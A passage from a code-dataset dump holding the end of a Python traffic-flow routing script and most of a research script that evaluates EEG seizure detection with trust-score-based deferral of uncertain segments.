a path\n # Returns\n path: list of (Node, Connection), node being the step and connection being the route taken from previous step\n restrictions: list of lists, restrictions generated, or carried on, from generating paths\n \"\"\"\n\n path = [(self.get_node(origin), self.get_node(origin).incoming_connections[0])]\n path, restrictions = self.find_next_best_node(path, self.get_node(destination), 0, restrictions)\n return path, restrictions\n\n def find_next_best_node(self, path, destination, index, restrictions):\n \"\"\"Find next best node\n Finds the next node in the path which gets closer to the destination\n # Arguements\n path: list of (Node, Connection), path being constructed\n destination: Node, goal for search\n index: int, current depth of path/search\n restrictions: list of lists, restricts nodes at specific indexes in a path\n # Returns\n path: list of (Node, Connection), node being the step and connection being the route taken from previous step\n restrictions: list of lists, restrictions generated, or carried on, from generating paths\n \"\"\"\n\n restrictions.append([])\n for connection in path[index][0].outgoing_connections:\n if connection.node == destination:\n path.append((connection.node, connection))\n restrictions[index].append(path[index][0])\n return path, restrictions\n elif connection.node.coordinates.distance(destination.coordinates) < path[index][0].coordinates.distance(\n destination.coordinates):\n\n try:\n if connection.node in restrictions[index + 1]:\n return path, restrictions\n except:\n pass\n path.append((connection.node, connection))\n return self.find_next_best_node(path, destination, index + 1, restrictions)\n return path, restrictions\n\n def get_node(self, scats_number):\n \"\"\"Returns the first node which matches the provided scats number\"\"\"\n return next(x for x in self.nodes if x.scats_number == scats_number)\n\n def show_graph(self):\n \"\"\"Prints the graph in a readable format\"\"\"\n\n for node in self.nodes:\n print(\"{0} - {1} {2}\\nConnections:\".format(node.scats_number, node.incoming_connections[0].streets[0],\n node.incoming_connections[0].streets[1]))\n for connection in node.outgoing_connections:\n print(\"\\t{0}\".format(connection.show_connection()))\n print(\"\\n\")\n\n def get_paths(self, origin, destination, min_path_count, model, time_in_minutes):\n \"\"\"Get paths\n Finds multiple unique paths to the same destination\n # Arguements\n origin: Node, starting point for path\n destination: Node, goal for search\n min_path_count: int, number of paths to attempt to create\n model: string, model to use to predict travel time\n time_in_minutes: int, the time at the start of the search\n # Returns\n path: list of (Node, Connection), node being the step and connection being the route taken from previous step\n \"\"\"\n\n paths = []\n restrictions = []\n for x in range(min_path_count):\n path, restrictions = self.get_path(origin, destination, restrictions)\n if path[-1][0].scats_number != destination:\n print(\"\\nNo more alternative paths.\")\n break\n paths.append(path)\n print(\"=====\")\n total_cost = 0\n elapsed_time = 0\n index = 0\n for i, j in path:\n if index + 1 == len(path):\n break\n if index == 0:\n print(\"Origin: {0} - {1} {2}.\".format(i.scats_number, j.streets[0], j.streets[1]))\n else:\n time_index = floor((time_in_minutes + elapsed_time) / 15)\n volume = j.get_model(model)[time_index]\n total_cost += volume\n distance_in_km = i.coordinates.distance(path[index + 1][0].coordinates)\n time = self.calculate_time(volume, 60, distance_in_km)\n print(\"{0} - {1} {2}. Cost: {3:.2f} mins Distance {4:.2f}km. Node coordinates: {5}\".format(\n i.scats_number, j.streets[0],\n j.streets[1], time * 60,\n distance_in_km, i.coordinates))\n elapsed_time += time * 60\n index += 1\n\n print(\"\\n\\t Total time to destination: {0:.0f} mins {1} seconds\".format(elapsed_time, decimal_to_seconds(\n elapsed_time - floor(elapsed_time))))\n return paths\n\n def calculate_time(self, volume, speed_limit, distance):\n \"\"\"Calculate time\n Calcualtes travel time in minutes\n # Arguements\n volume: float, volume of cars at time of traversal\n speed_limit: float, max speed on road\n distance: float, length of road\n # Returns\n result: float, travel time in minutes\n \"\"\"\n\n travel_speed = get_speed_coefficient(volume, speed_limit)\n print(\"Speed: {0}. Volume {1}\".format(travel_speed, volume))\n return distance / travel_speed\n\n\ndef get_speed_coefficient(volume, speed_limit):\n \"\"\"Get speed coefficient\n Calculates speed using quadratic formula based on volume\n # Arguements\n volume: float, volume of cars at time of traversal\n speed_limit: float, maximum speed\n # Returns\n result: x where y = Ax^2 * Bx + C, clamped between 0 and speed_limit\n \"\"\"\n\n A = -0.9765625\n B = 62.5\n C = volume\n speed = 60\n D = pow(B, 2) - (4 * A * -C)\n return np.clip(((-B - sqrt(D) / (2 * A)) + 94.5), 0, speed_limit)\n\n\ndef decimal_to_seconds(value):\n \"\"\"Converts decimal minutes to seconds\"\"\"\n\n return floor((value / 100) * 6000)\n\n\ndef get_graph():\n \"\"\"Contructs Node graph for representing network of scats sites\"\"\"\n\n graph = Graph()\n\n for scats in SCATS_DATA.get_all_scats_numbers():\n coordinates = SCATS_DATA.get_positional_data(scats)\n node = Node(scats, coordinates)\n # print(\"adding connections for {0}\".format(scats))\n for approach in SCATS_DATA.get_scats_approaches_names(scats):\n connection_id = SCATS_DATA.get_location_id(approach)\n node.incoming_connections.append(Connection(approach, connection_id, node))\n graph.nodes.append(node)\n\n for node in graph.nodes:\n node.find_outgoing_connections(graph)\n return graph\n\n\ndef make_graph():\n graph = get_graph()\n\n excluded_nodes = [2846, 2200, 2825, 2820, 4812, 4821]\n G = nx.DiGraph()\n for node in graph.nodes:\n if node.coordinates.x != 0:\n if node.scats_number not in excluded_nodes:\n G.add_node(node.scats_number, pos=node.coordinates.to_tuple())\n\n for connection in node.outgoing_connections:\n if connection.node.scats_number not in excluded_nodes:\n G.add_edge(node.scats_number, connection.node.scats_number)\n\n pos = nx.get_node_attributes(G, 'pos')\n nx.draw_networkx_nodes(G, pos, node_size=200)\n nx.draw_networkx_edges(G, pos, edgelist=G.edges(), edge_color='black')\n nx.draw_networkx_labels(G, pos)\n\n\ndef route_graph(origin, destination, min_path_count, model, time_in_minutes):\n \"\"\"Returns graph with highlighted path\"\"\"\n graph = get_graph()\n paths = graph.get_paths(origin, destination, min_path_count, model, time_in_minutes)\n excluded_nodes = [2846, 2200, 2825, 2820, 4812, 4821]\n G = nx.DiGraph()\n for node in graph.nodes:\n if node.coordinates.x != 0:\n if node.scats_number not in excluded_nodes:\n G.add_node(node.scats_number, pos=node.coordinates.to_tuple())\n\n for connection in node.outgoing_connections:\n if connection.node.scats_number not in excluded_nodes:\n G.add_edge(node.scats_number, connection.node.scats_number)\n\n colour_map = []\n for node in G:\n colour_map.append(set_node_colour(node, paths))\n edge_colour_map = []\n edge_size_map = []\n for edge in G.edges():\n colour, size = set_edge_attributes(edge, paths)\n edge_colour_map.append(colour)\n edge_size_map.append(size)\n\n pos = nx.get_node_attributes(G, 'pos')\n nx.draw_networkx_nodes(G, pos, node_size=200, node_color=colour_map)\n nx.draw_networkx_edges(G, pos, edgelist=G.edges(), edge_color=edge_colour_map, width=edge_size_map)\n nx.draw_networkx_labels(G, pos)\n\n\ndef set_node_colour(node, paths):\n for i, j in paths[0]:\n if node == i.scats_number:\n return 'red'\n return 'gray'\n\n\ndef set_edge_attributes(edge, paths):\n x = 0\n for i, j in paths[0]:\n if edge[0] == i.scats_number:\n node = None\n try:\n node = paths[0][x + 1][1].node.scats_number\n if edge[1] == node:\n return 'red', 4\n else:\n return 'black', 0\n except:\n print(\"oops\")\n x += 1\n return 'black', 1\n\n\ndef main():\n graph = get_graph()\n graph.show_graph()\n\n route_graph(970, 4040, 5, \"gru\", 0 * 4 * 15)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"joshhehir/Traffic-Flow-Prediction","sub_path":"TFPS/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":18915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26061251520","text":"import sys\nsys.path.insert(1, '../')\nimport numpy as np \nimport time\nimport aux_functions as af\nimport aux_functions_remove as afr\nimport segment_count as sc\n\n\ndef cwr(SVM_DISTANCES=False, REMOVE_ONLY_NOSEIZURE=True, SAME_PERCENTILE=True, TRUST_SCORE_FILTERING=False, p_low_trust=5):\n\n time_start_all = time.time()\n\n #############################################################\n # the indices in the arrays are the real indices in Python #\n # so idx = [2, 5] should be sliced as ar[2:6] #\n #############################################################\n\n # directories containing the labels and the features\n # these are not function for the Github version.\n labels_dir_base = '/Annotations_outputs_classifier/'\n trustmodels_dir_base = '/trust_models/'\n svm_scores_dir = '/SVM_confidence/'\n # patient IDs with measurements\n pat_id_arr_original = [10,12,13,14,15,16,17,22,24,30,33,34,36,40,41,54,56,59,61,63,64,65,67,68,70,71,72,73,74,75,\n 76,77,78,79,82,83,89,90,93,94,95,99]\n pat_id_arr_new = [11, 25, 28, 35, 47, 48, 58, 60, 66, 80, 92, 98]\n\n pat_id_arr = pat_id_arr_original + pat_id_arr_new\n n_pat = len(pat_id_arr)\n\n # classify all samples (used for debugging purposes)\n REJECT_NOTHING = False\n # use the SVM model trained on the aimII labels or not (= SVM trained on aimII labels)\n AIMII_SVM_MODEL = True\n # use the trust models trained on the aimII train labels\n TRAIN_LABELS_TRUST = False\n\n # number of minutes in a segment that contains a possible seizure\n n_minute_interval_seizure = 5\n n_seconds_interval_seizure = n_minute_interval_seizure * 60\n # number of minutes in a segment that doesn't contain a seizure\n n_minute_interval_no_seizure = 5\n n_seconds_interval_no_seizure = n_minute_interval_no_seizure * 60\n\n # create dictionaries of different inputs\n # done for efficiency purposes (although in the end, influence on speed was small)\n dict_labels = {}\n dict_seizure_timings = {}\n for pid in pat_id_arr:\n pid_str = str(pid)\n # note that this should actually have been called aim2\n fln_labels_all = labels_dir_base + 'Patient_labelsaim1_' + str(pid) + '.npy'\n labels_all = af.load_with(fln_labels_all)\n dict_labels[pid_str] = labels_all\n dict_seizure_timings[pid_str] = af.calculate_real_seizure_timings(labels_all)\n dict_predictions = {}\n for pid in pat_id_arr:\n pid_str = str(pid)\n if AIMII_SVM_MODEL:\n str_predictions = 'Patient_predictions_aimII_rmsa_'\n else:\n str_predictions = 'Patient_predictions_rmsa_'\n fln_predictions_all = labels_dir_base + str_predictions + str(pid) + '.npy'\n dict_predictions[pid_str] = af.load_with(fln_predictions_all)\n dict_idx_to_check = {}\n for pid in pat_id_arr:\n pid_str = str(pid)\n predictions_all = dict_predictions[pid_str]\n idx_to_check = af.calc_idx_to_check_for_seizure(predictions_all, min_n_ones=4)\n dict_idx_to_check[pid_str] = idx_to_check\n dict_trust = {}\n for pid in pat_id_arr:\n pid_str = str(pid)\n if SVM_DISTANCES:\n if AIMII_SVM_MODEL:\n scores_svm_dir = '/SVM_confidence_aimII/'\n svm_string = 'svm_aimII_scores_pat_'\n else:\n scores_svm_dir = '/SVM_confidence/'\n svm_string = 'svm_scores_pat_'\n ts_filename = scores_svm_dir + svm_string + str(pid) + '.npy'\n trust_scores_pat = af.load_with(ts_filename)\n # take absolute value\n # dict_trust[pid_str] = abs(trust_scores_pat)\n # take the set-up with the best result for the classify-all scenario:\n # sigmoid with a = 0.01\n a_temp_scaling = 0.1\n dict_trust[pid_str] = af.sigmoid_trust(trust_scores_pat, a=a_temp_scaling)\n else:\n if AIMII_SVM_MODEL:\n if TRAIN_LABELS_TRUST:\n ts_filename = trustmodels_dir_base + 'trust_scores_aimII_kaat_pat_' + str(pid) + '_alpha_0p05_k_10_filtering_none_noseizesegments_100pca_20.npy' \n else:\n ts_filename = trustmodels_dir_base + 'trust_scores_aimII_pat_all_' + str(pid) + '_alpha_0p05_k_10_filtering_none_noseizesegments_100pca_20.npy' \n else:\n if TRAIN_LABELS_TRUST:\n ts_filename = trustmodels_dir_base + 'trust_scores_kaat_pat_' + str(pid) + '_alpha_0p05_k_10_filtering_none_noseizesegments_100pca_20.npy'\n else:\n ts_filename = trustmodels_dir_base + 'trust_scores_pat_all_' + str(pid) + '_alpha_0p05_k_10_filtering_none_noseizesegments_100pca_20.npy'\n trust_scores_pat = af.load_with(ts_filename)\n dict_trust[pid_str] = trust_scores_pat\n dict_seizure_flags = {}\n for pid in pat_id_arr:\n pid_str = str(pid)\n start_idx = dict_idx_to_check[pid_str]\n predictions_all = dict_predictions[pid_str]\n if TRUST_SCORE_FILTERING:\n trust_scores_pat = dict_trust[pid_str]\n trust_scores_pat = np.array(trust_scores_pat)\n start_idx = np.array(start_idx)\n start_idx = start_idx.astype(int)\n # if SVM_DISTANCES:\n # seizure_flags_all, n_not_trusted = af.calculate_seizure_flags_w_trustscores_fast(\n # label_input=predictions_all, trust_scores=trust_scores_pat, percentile_level=0.1, idx_to_check=start_idx)\n # else:\n if AIMII_SVM_MODEL:\n seizure_flags_all, n_not_trusted = af.calculate_seizure_flags_w_trustscores_fast(\n label_input=predictions_all, trust_scores=trust_scores_pat, percentile_level=9.6, idx_to_check=start_idx)\n else:\n seizure_flags_all, n_not_trusted = af.calculate_seizure_flags_w_trustscores_fast(\n label_input=predictions_all, trust_scores=trust_scores_pat, percentile_level=2.0416666, idx_to_check=start_idx)\n else:\n seizure_flags_all = af.calculate_seizure_flags_fast(predictions_all, start_idx)\n dict_seizure_flags[pid_str] = seizure_flags_all \n\n det_sens_perc_av = []\n det_sens_perc_std = []\n det_sens_perc_med = []\n det_sens_perc_range = []\n\n FP_perc_av = []\n FP_perc_std = []\n FP_perc_med = []\n FP_perc_range = []\n\n F1_perc_av = []\n F1_perc_std = []\n F1_perc_med = []\n F1_perc_range = []\n\n PPV_perc_av = []\n PPV_perc_std = []\n PPV_perc_med = []\n PPV_perc_range = [] \n\n dd_perc_av = []\n dd_perc_std = []\n dd_perc_med = []\n dd_perc_range = []\n\n # number of seizures per patient\n n_seizures = [0, 1, 8, 1, 1, 8, 2, 2, 1, 0, 3, 0, 3, 2, 1, 0, 1, 1, 1, 2, 0, 5, 1, 4, 17, 5, 3, 2, \n 3, 2, 6, 0, 5, 2, 6, 2, 0, 1, 2, 3, 1, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n # print(\"total number of seizures = \" + str(sum(n_seizures))) \n\n perc_removed_arr = []\n per_arr = [0, 0.1, 1, 5, 10, 15, 20, 25, 30, 35, 40, 50, 60, 70, 80, 90]\n # if the segments are removed with different percentiles\n # calculate the distribution of all trust scores\n if not SAME_PERCENTILE:\n all_trust_all_patient = []\n for cnt in range(n_pat):\n pat_id = pat_id_arr[cnt]\n pid_str = str(pat_id)\n predictions_all = dict_predictions[pid_str]\n labels_all = dict_labels[pid_str]\n seizure_flags_all = dict_seizure_flags[pid_str]\n # put these into \"n_minute_interval\"-minute seizure segments\n length_full_eeg = predictions_all.shape[0]\n # for each seizure flag -> take -2.5 minutes and +2.5 minutes\n # [s_1, e_1], [s_2, e_2], ...\n # if there is overlap overlap e_i and s_i+1 -> merge \n if len(seizure_flags_all) > 0:\n possible_seizure_segments = afr.predicted_seizure_segments(seizure_flags_all, full_length=length_full_eeg, interval=n_seconds_interval_seizure, collate=True)\n else:\n possible_seizure_segments = np.array([])\n # create non-seizure segments\n non_seizure_segments = afr.predicted_non_seizure_segments(interval=n_seconds_interval_no_seizure, full_length=length_full_eeg, seiz_segments=possible_seizure_segments) \n # if there are no \"non-seizure segments\": print a warning\n # this should normally only happen if > 99% of segments are removed\n if np.array(non_seizure_segments).shape[0] == 0:\n print(\"did not find any \\\"no seizure segments\\\" for patient id: \" + str(pat_id))\n print(\"\")\n trust_scores_pat = dict_trust[pid_str] \n # has to be casted as \"float32\" to avoid errors with \"nanmean\". Is an issue with numpy, not the code here.\n trust_scores_pat = np.array(trust_scores_pat, dtype='float32')\n nonseizure_segments_trusts = afr.calc_trust_of_segments_variable_length(trust_arr=trust_scores_pat, segments=non_seizure_segments, lowest_percent=p_low_trust) \n nonseizure_segments_trusts = np.array(nonseizure_segments_trusts)\n if REMOVE_ONLY_NOSEIZURE:\n all_trust_all_patient = all_trust_all_patient + list(nonseizure_segments_trusts)\n else:\n if possible_seizure_segments.shape[0] > 0:\n possible_seizure_segments_trusts = afr.calc_trust_of_segments_variable_length(trust_arr=trust_scores_pat, segments=possible_seizure_segments, lowest_percent=p_low_trust)\n all_trust_all_patient = all_trust_all_patient + list(nonseizure_segments_trusts) \n all_trust_all_patient = all_trust_all_patient + list(possible_seizure_segments_trusts)\n else:\n all_trust_all_patient = all_trust_all_patient + list(nonseizure_segments_trusts)\n # impute NaNs by the median trust score\n all_trust_all_patient = np.array(all_trust_all_patient)\n nan_mask = np.isnan(all_trust_all_patient)\n all_trust_all_patient[nan_mask] = np.nanmedian(all_trust_all_patient)\n\n mean_seg_length = [] \n std_seg_length = []\n n_seg_per_day = []\n\n # start of the main loop \n for per in per_arr:\n print(\"\")\n print(\"per = \" + str(per))\n perc_checked = 0.\n FP_tot = 0 # for debugging purposes\n\n # define arrays that contain the performances\n F1_final = []\n PPV_final = []\n detection_sensitivity_final = []\n FP_rate_final = []\n detection_delay_final = []\n\n # determine threshold for patient-specific removal strategy\n if not SAME_PERCENTILE:\n threshold_per = np.percentile(all_trust_all_patient, per)\n \n mean_length_pat_arr = [] \n std_length_pat_arr = []\n n_seg_pat_arr = []\n\n for cnt in range(n_pat):\n pat_id = pat_id_arr[cnt]\n pid_str = str(pat_id)\n ########################################################\n # find all possible segments containing a seizure flag #\n ########################################################\n predictions_all = dict_predictions[pid_str]\n labels_all = dict_labels[pid_str]\n full_seizure_timings = dict_seizure_timings[pid_str]\n seizure_flags_all = dict_seizure_flags[pid_str]\n length_full_eeg = predictions_all.shape[0]\n # for each seizure flag -> take - (n_minute_interval / 2) minutes and + (n_minute_interval / 2) minutes\n # [s_1, e_1], [s_2, e_2], ...\n # if there is overlap overlap e_i and s_i+1 -> merge \n if len(seizure_flags_all) > 0:\n possible_seizure_segments = afr.predicted_seizure_segments(seizure_flags_all, full_length=length_full_eeg, interval=n_seconds_interval_seizure, collate=True)\n else:\n possible_seizure_segments = np.array([])\n # create non-seizure segments\n non_seizure_segments = afr.predicted_non_seizure_segments(interval=n_seconds_interval_no_seizure, full_length=length_full_eeg, seiz_segments=possible_seizure_segments) \n # if there are no \"non-seizure segments\": print a warning\n # this should normally only happen if > 99% of segments are removed\n if np.array(non_seizure_segments).shape[0] == 0:\n print(\"did not find any \\\"no seizure segments\\\" for patient id: \" + str(pat_id))\n print(\"\")\n #################################################\n # calculate average trust score of each segment #\n #################################################\n trust_scores_pat = dict_trust[pid_str] \n # has to be casted as \"float32\" to avoid errors with \"nanmean\". This is an issue with numpy, not this code.\n trust_scores_pat = np.array(trust_scores_pat, dtype='float32')\n nonseizure_segments_trusts = afr.calc_trust_of_segments_variable_length(trust_arr=trust_scores_pat, segments=non_seizure_segments, lowest_percent=p_low_trust)\n nonseizure_segments_trusts = np.array(nonseizure_segments_trusts)\n if possible_seizure_segments.shape[0] > 0:\n possible_seizure_segments_trusts = afr.calc_trust_of_segments_variable_length(trust_arr=trust_scores_pat, segments=possible_seizure_segments, lowest_percent=p_low_trust)\n possible_seizure_segments_trusts = np.array(possible_seizure_segments_trusts)\n # combine all the trust scores for the seizure / nonseizure segments\n if not REMOVE_ONLY_NOSEIZURE:\n all_segments_trusts = list(nonseizure_segments_trusts) + list(possible_seizure_segments_trusts)\n else:\n all_segments_trusts = list(nonseizure_segments_trusts)\n # impute NaNs with median\n all_segments_trusts = np.array(all_segments_trusts)\n nan_mask = np.isnan(all_segments_trusts)\n nanmed_all = np.nanmedian(all_segments_trusts)\n all_segments_trusts[nan_mask] = nanmed_all\n nan_mask = np.isnan(possible_seizure_segments_trusts)\n possible_seizure_segments_trusts[nan_mask] = nanmed_all\n nan_mask = np.isnan(nonseizure_segments_trusts)\n nonseizure_segments_trusts[nan_mask] = nanmed_all\n if SAME_PERCENTILE:\n low_confidence_segments_seizure = np.where(possible_seizure_segments_trusts <= np.percentile(all_segments_trusts, per))[0]\n else:\n low_confidence_segments_seizure = np.where(possible_seizure_segments_trusts <= threshold_per)[0]\n if low_confidence_segments_seizure.shape[0] == 0:\n low_confidence_segments_seizure = np.array([])\n if REJECT_NOTHING:\n low_confidence_segments_seizure = np.array([])\n low_confidence_segments_seizure = np.array(low_confidence_segments_seizure)\n possible_seizure_segments = np.array(possible_seizure_segments)\n if low_confidence_segments_seizure.shape[0] > 0:\n low_confidence_segments_full = possible_seizure_segments[low_confidence_segments_seizure]\n else:\n low_confidence_segments_full = np.array([])\n if REMOVE_ONLY_NOSEIZURE:\n low_confidence_segments_full = possible_seizure_segments\n segments_to_check_seizure = []\n else:\n segments_to_check_seizure = afr.collate_trusted_segments(all_segments=possible_seizure_segments, non_trusted_segments_idx=low_confidence_segments_seizure)\n manual_detection_seizure_segments = afr.seizure_detected_manually(low_confidence_segments_full, full_seizure_timings, n_seconds_needed=10)\n manual_detection_flags_seizure_segments = afr.false_positive_detected_manually(low_confidence_segments_full, seizure_flags_all, n_seconds_needed=1)\n else:\n manual_detection_seizure_segments = np.array([])\n manual_detection_flags_seizure_segments = np.array([])\n segments_to_check_seizure = []\n all_segments_trusts = nonseizure_segments_trusts \n nan_mask = np.isnan(all_segments_trusts)\n all_segments_trusts[nan_mask] = np.nanmedian(all_segments_trusts)\n nan_mask = np.isnan(nonseizure_segments_trusts)\n nonseizure_segments_trusts[nan_mask] = np.nanmedian(all_segments_trusts)\n #########################################################\n # defer the low-trusted segments, and classify the rest #\n #########################################################\n if SAME_PERCENTILE: # remove separate percentile per patient\n low_confidence_segments = np.where(nonseizure_segments_trusts <= np.percentile(all_segments_trusts, per))[0]\n else:\n low_confidence_segments = np.where(nonseizure_segments_trusts <= threshold_per)[0]\n if REJECT_NOTHING:\n low_confidence_segments = np.array([])\n # calculate segments to check\n segments_to_check_non_seizure = afr.collate_trusted_segments(all_segments=non_seizure_segments, non_trusted_segments_idx=low_confidence_segments)\n low_confidence_segments = np.array(low_confidence_segments)\n non_seizure_segments = np.array(non_seizure_segments)\n low_confidence_segments_full = non_seizure_segments[low_confidence_segments]\n manual_detection_nonseizure_segments = afr.seizure_detected_manually(low_confidence_segments_full, full_seizure_timings, n_seconds_needed=10)\n manual_detection_flags_nonseizure_segments = afr.false_positive_detected_manually(low_confidence_segments_full, seizure_flags_all, n_seconds_needed=1)\n if manual_detection_seizure_segments.shape[0] > 0:\n manual_detection_segments = manual_detection_nonseizure_segments | manual_detection_seizure_segments\n else:\n manual_detection_segments = manual_detection_nonseizure_segments\n if manual_detection_flags_seizure_segments.shape[0] > 0:\n manual_detection_flags_segments = manual_detection_flags_seizure_segments | manual_detection_flags_nonseizure_segments\n else:\n manual_detection_flags_segments = manual_detection_flags_nonseizure_segments\n if possible_seizure_segments.shape[0] > 0:\n segments_to_check_seizure = np.array(segments_to_check_seizure)\n segments_to_check_non_seizure = np.array(segments_to_check_non_seizure)\n if (segments_to_check_seizure.shape[0] > 0) and (segments_to_check_non_seizure.shape[0] > 0):\n segments_to_check = afr.merge_segments_seizure_no_seizure(seizure_segments=segments_to_check_seizure, no_seizure_segments=segments_to_check_non_seizure)\n elif segments_to_check_non_seizure.shape[0] > 0:\n segments_to_check = segments_to_check_non_seizure\n else:\n segments_to_check = segments_to_check_seizure\n else:\n segments_to_check = segments_to_check_non_seizure\n n_hours_checked = 0\n segm_cnt = 0\n TP = 0\n FP = 0\n FN = 0\n total_seizures = 0\n n_seconds_checked = 0.\n n_seizures_in_non_rejected_part = 0\n detection_delay_segments = []\n n_seg_pat, mean_length_pat, std_length_pat = sc.count_segments(segments_to_check, total_length=length_full_eeg)\n mean_length_pat_arr.append(mean_length_pat)\n std_length_pat_arr.append(std_length_pat)\n n_seg_pat_arr.append(n_seg_pat)\n for segment in segments_to_check:\n seizure_in_segment, detected_manually_in_segment, cnt_cutting_error = afr.seizure_timings_in_segment(segment, full_seizure_timings, manual_detection_segments)\n predicted_in_segment, predicted_manually_in_segment = afr.seizure_fp_in_segment(segment, seizure_flags_all, manual_detection_flags_segments)\n start_idx = int(segment[0])\n end_idx = int(segment[1] + 1)\n n_seconds_checked += (end_idx - start_idx)\n seizure_timings = afr.shift_2d_array(seizure_in_segment, start_idx, end_idx)\n seizure_flags = afr.shift_1d_array(seizure_flags_all, start_idx, end_idx)\n TP_seg, FP_seg, FN_seg, total_seizures_seg, det_delay = afr.precision_metrics_kaat_10s_w_remove_w_fp(seizure_flags, seizure_timings, detected_manually_in_segment, predicted_manually_in_segment)\n detection_delay_segments = detection_delay_segments + det_delay\n TP += TP_seg\n FP += FP_seg\n FN += FN_seg\n FN += cnt_cutting_error\n total_seizures += (total_seizures_seg - sum(detected_manually_in_segment))\n n_seizures_in_non_rejected_part += seizure_timings.shape[0]\n perc_checked += (float(n_seconds_checked) / float(length_full_eeg))\n if REMOVE_ONLY_NOSEIZURE:\n if n_seizures[cnt] > 0:\n seizures_detected_by_neurologist = n_seizures[cnt] - total_seizures\n TP = float(seizures_detected_by_neurologist)\n FN = float(total_seizures)\n if seizures_detected_by_neurologist > 0:\n detection_sensitivity = TP / (TP + FN)\n F1 = 2.*TP / (2.*TP + FN)\n PPV = 1.\n else:\n detection_sensitivity = 0.\n F1 = 0. \n PPV = 0. \n F1_final.append(F1)\n PPV_final.append(PPV)\n detection_sensitivity_final.append(detection_sensitivity)\n detection_delay_final.append(0)\n FP_rate_final.append(0)\n else:\n if n_seizures[cnt] > 0: \n seizures_detected_by_neurologist = n_seizures[cnt] - total_seizures\n TP = float(TP) + float(seizures_detected_by_neurologist)\n if int(TP) > 0:\n detection_sensitivity = TP / (TP + FN)\n PPV = TP / (TP + FP)\n F1 = 2.*TP / (2.*TP + FP + FN)\n else:\n detection_sensitivity = 0.\n F1 = 0.\n PPV = 0.\n PPV_final.append(PPV)\n F1_final.append(F1)\n PPV_final.append(PPV)\n detection_sensitivity_final.append(detection_sensitivity)\n det_delay_neurologist = [0] * seizures_detected_by_neurologist\n det_delay_combined = detection_delay_segments + det_delay_neurologist\n detection_delay_final.append(np.mean(det_delay_combined))\n n_hours = float(labels_all.shape[0]) / (60. * 60.)\n n_hours_checked = float(n_seconds_checked) / (60. * 60.)\n if int(n_hours_checked) == 0:\n FP_rate = 0\n else:\n FP_rate = 24. * FP / n_hours_checked\n FP_rate_final.append(FP_rate)\n\n FP_tot += FP\n perc_removed_arr.append(1. - (perc_checked / float(n_pat)))\n\n mean_seg_length.append(np.mean(np.array(mean_length_pat_arr)))\n std_seg_length.append(np.mean(np.array(std_length_pat_arr)))\n n_seg_per_day.append(np.mean(np.array(n_seg_pat_arr)))\n\n Z_val = 1.96\n n_estimates = len(pat_id_arr)\n sqrt_n = np.sqrt(n_estimates)\n Zdsn = Z_val / sqrt_n\n\n print(\"FP rate: \")\n mn, st, med, rmax, rmin = af.print_summary_statistics(FP_rate_final, Zdsn)\n FP_perc_av.append(mn)\n FP_perc_std.append(st)\n FP_perc_med.append(med)\n FP_perc_range.append([rmin, rmax])\n \n print(\"detection sensitivity: \")\n mn, st, med, rmax, rmin = af.print_summary_statistics(detection_sensitivity_final, Zdsn)\n det_sens_perc_av.append(mn)\n det_sens_perc_std.append(st)\n det_sens_perc_med.append(med)\n det_sens_perc_range.append([rmin, rmax])\n\n print(\"PPV: \")\n mn, st, med, rmax, rmin = af.print_summary_statistics(PPV_final, Zdsn)\n PPV_perc_av.append(mn)\n PPV_perc_std.append(st)\n PPV_perc_med.append(med)\n PPV_perc_range.append([rmin, rmax])\n\n print(\"F1: \")\n mn, st, med, rmax, rmin = af.print_summary_statistics(F1_final, Zdsn)\n F1_perc_av.append(mn)\n F1_perc_std.append(st)\n F1_perc_med.append(med)\n F1_perc_range.append([rmin, rmax]) \n\n print('detection delay: ')\n mn, st, med, rmax, rmin = af.print_summary_statistics(detection_delay_final, Zdsn)\n dd_perc_av.append(mn)\n dd_perc_std.append(st)\n dd_perc_med.append(med)\n dd_perc_range.append([rmin, rmax])\n \n # np.set_printoptions(precision=3)\n # print(\"# detection sensitivity: \")\n # print('sens = ' + str(np.array(det_sens_perc_av)))\n # print('sens_std = ' + str(np.array(det_sens_perc_std)))\n # print('sens_med = ' + str(np.array(det_sens_perc_med)))\n # print('sens_range = ' + str(np.array(det_sens_perc_range)))\n\n # print(\"# FP rate: \")\n # print('FP = ' + str(np.array(FP_perc_av)))\n # print('FP_std = ' + str(np.array(FP_perc_std)))\n # print('FP_med = ' + str(np.array(FP_perc_med)))\n # print('FP_range = ' + str(np.array(FP_perc_range)))\n\n # print(\"# PPV: \")\n # print('PPV = ' + str(np.array(PPV_perc_av)))\n # print('PPV_std = ' + str(np.array(PPV_perc_std)))\n # print('PPV_med = ' + str(np.array(PPV_perc_med)))\n # print('PPV_range = ' + str(np.array(PPV_perc_range)))\n\n # print(\"# F1: \")\n # print('F1 = ' + str(np.array(F1_perc_av)))\n # print('F1_std = ' + str(np.array(F1_perc_std)))\n # print('F1_med = ' + str(np.array(F1_perc_med)))\n # print('F1_range = ' + str(np.array(F1_perc_range)))\n\n # print(\"# percent removed: \")\n # print('perc_removed = ' + str(np.array(perc_removed_arr)))\n\n # print(\"# detection delay: \")\n # print('dd = ' + str(np.array(dd_perc_av)))\n # print('dd_std = ' + str(np.array(dd_perc_std)))\n # print('dd_med = ' + str(np.array(dd_perc_med)))\n # print('dd_range = ' + str(np.array(dd_perc_range)))\n\n # add the 0% performance to the array\n perc_removed_arr = [0] + list(perc_removed_arr)\n if AIMII_SVM_MODEL:\n if not TRUST_SCORE_FILTERING:\n # sensitivity\n det_sens_perc_av = [0.830] + list(det_sens_perc_av)\n det_sens_perc_std = [0.300] + list(det_sens_perc_std)\n det_sens_perc_med = [1] + list(det_sens_perc_med)\n det_sens_perc_range = [[0, 1]] + list(det_sens_perc_range)\n # FP rate\n FP_perc_av = [17.2] + list(FP_perc_av)\n FP_perc_std = [21.0] + list(FP_perc_std)\n FP_perc_med = [9.54] + list(FP_perc_med)\n FP_perc_range = [[0.26, 98.2]] + list(FP_perc_range)\n # PPV\n PPV_perc_av = [0.126] + list(PPV_perc_av)\n PPV_perc_std = [0.174] + list(PPV_perc_std)\n PPV_perc_med = [0.055555] + list(PPV_perc_med)\n PPV_perc_range = [[0, 0.875]] + list(PPV_perc_range)\n # F1\n F1_perc_av = [0.183] + list(F1_perc_av)\n F1_perc_std = [0.203] + list(F1_perc_std)\n F1_perc_med = [0.105] + list(F1_perc_med)\n F1_perc_range = 